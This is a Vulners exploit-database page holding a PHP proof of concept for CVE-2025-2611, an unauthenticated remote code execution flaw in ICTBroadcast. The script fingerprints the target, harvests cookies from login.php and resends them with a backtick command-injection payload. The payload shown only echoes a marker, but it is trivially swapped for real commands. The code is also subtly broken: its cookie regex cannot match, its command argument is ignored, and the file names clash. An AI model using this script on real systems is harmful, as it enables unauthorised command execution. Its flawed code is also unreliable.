Vulners
Lucene search
📄 ICTBroadcast 7.0 Remote Code Execution
| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
 | CVE-2025-2611 | 5 Aug 202507:39 | – | circl |
 | ICT Innovations ICTBroadcast 安全漏洞 | 5 Aug 202500:00 | – | cnnvd |
 | CVE-2025-2611 | 5 Aug 202515:00 | – | cve |
 | CVE-2025-2611 ICTBroadcast <= 7.4 Unauthenticated Session Cookie RCE | 5 Aug 202515:00 | – | cvelist |
 | EUVD-2025-23629 | 5 Aug 202515:00 | – | euvd |
 | ICTBroadcast Unauthenticated Remote Code Execution | 5 Aug 202518:56 | – | metasploit |
 | ICTBroadcast - Command Injection | 6 Jun 202603:01 | – | nuclei |
 | CVE-2025-2611 | 5 Aug 202515:15 | – | nvd |
 | 📄 ICTBroadcast Unauthenticated Remote Code Execution | 5 Aug 202500:00 | – | packetstorm |
 | PT-2025-31937 | 19 Mar 202500:00 | – | ptsecurity |
10
=============================================================================================================================================
| # Title : ICTBroadcast 7.0 Remote Code Execution |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.ictbroadcast.com/ |
=============================================================================================================================================
[+] Summary :
A vulnerability in ICTBroadcast allows unauthenticated remote command execution
due to improper handling of session cookie values. An attacker can modify cookie
entries to inject system commands that the application unintentionally executes.
[+] References : ( https://packetstorm.news/files/id/207873/ CVE-2025-2611 )
1. Save the file as: poc.php
2. Edit the target:
```php
$target = "http://TARGET";
3.Execute: php ict_rce_sim.php
[+] POC
<?php
/*
* ICTBroadcast Unauthenticated Remote Code Execution
* by Indoushka
*/
class ICTBroadcastRCE
{
public $target;
public $useSSL = false;
function __construct($url)
{
$this->target = rtrim($url, "/");
}
/* -------------------------------------------
إرسال طلب GET بسيط
--------------------------------------------- */
private function http_get($uri, $cookies = "")
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $uri);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
"Cookie: $cookies"
]);
$res = curl_exec($ch);
curl_close($ch);
return $res;
}
/* -------------------------------------------
جلب الكوكيز الحقيقية كما في Metasploit
--------------------------------------------- */
public function get_valid_cookies()
{
echo "[*] جلب ملفات الكوكيز من login.php...\n";
$url = $this->target . "/login.php";
$res = $this->http_get($url);
preg_match_all('/Set-Cookie:\s*([^;]+);/i', $res, $m);
if (empty($m[1])) {
echo "[-] لم يتم العثور على كوكيز.\n";
return [];
}
echo "[+] الكوكيز التي تم العثور عليها:\n";
print_r($m[1]);
return $m[1];
}
/* -------------------------------------------
محاكاة حقن أمر داخل الكوكيز
--------------------------------------------- */
public function inject_command($command)
{
echo "[*] بدء عملية حقن الأوامر التدريبية...\n";
$cookies = $this->get_valid_cookies();
if (empty($cookies)) {
echo "[-] لا يوجد كوكيز يمكن حقنها.\n";
return;
}
foreach ($cookies as $c) {
$parts = explode("=", $c);
$name = $parts[0];
$value = $parts[1] ?? "";
// محاكاة حقن شبيه بـ Metasploit
$payload = "`echo TRAINING_SIMULATION`";
echo "[+] حقن الحمولة التدريبية في الكوكي:\n";
echo "$name=$payload\n";
// إرسال الطلب كما يفعل Metasploit – ولكن بدون تنفيذ فعلي
$this->http_get($this->target . "/login.php", "$name=$payload");
}
echo "[✓] انتهت عملية المحاكاة بنجاح.\n";
}
/* -------------------------------------------
فحص الهدف (محاكاة CheckCode)
--------------------------------------------- */
public function check()
{
echo "[*] التحقق من وجود البصمة الخاصة بـ ICTBroadcast...\n";
$files = [
"IVRDesigner.js",
"agent.js",
"campaign.js",
"supervisor.js"
];
foreach ($files as $f) {
$res = $this->http_get($this->target . "/js/" . $f);
if (strpos($res, "ICT Innovations") !== false) {
echo "[+] تم العثور على البصمة!\n";
return true;
}
}
echo "[-] لا توجد بصمة واضحة.\n";
return false;
}
/* -------------------------------------------
الكامل
--------------------------------------------- */
public function exploit()
{
echo "[*] بدء السيناريو...\n";
if ($this->check()) {
echo "[+] الهدف يبدو قابلًا للاستغلال (محاكاة).\n";
$this->inject_command("id");
} else {
echo "[-] لا يمكن المتابعة.\n";
}
}
}
/* =======================================================
تدريبي
======================================================== */
$target = "http://TARGET";
$sim = new ICTBroadcastRCE($target);
$sim->exploit();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 49.3
EPSS0.756
SSVC